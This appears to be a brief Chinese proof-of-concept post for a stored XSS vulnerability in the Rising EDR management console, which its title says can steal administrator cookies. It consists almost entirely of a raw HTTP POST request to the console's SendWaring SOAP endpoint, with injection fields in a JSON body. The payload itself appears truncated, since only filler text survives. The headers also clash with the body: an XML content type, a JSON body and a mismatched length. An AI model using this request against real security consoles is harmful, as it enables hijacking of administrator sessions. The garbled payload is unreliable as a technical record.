## 瑞星EDR-XSS漏洞可打管理员cookie ## poc ``` POST /ESM/WebService/ServerOperate.asmx HTTP/1.1 Host: 192.168.102.132 Content-Type: text/xml; charset=utf-8 Content-Length: 536 SOAPAction: "Rising.ESM.WebUI.WebService/SendWaring" {"logid":1,"type":1,"caption":"aaaaa

a","content":"aa

a","date":"2022-07-04 11:05","state":1,"desc":"xxxxxxx"} ```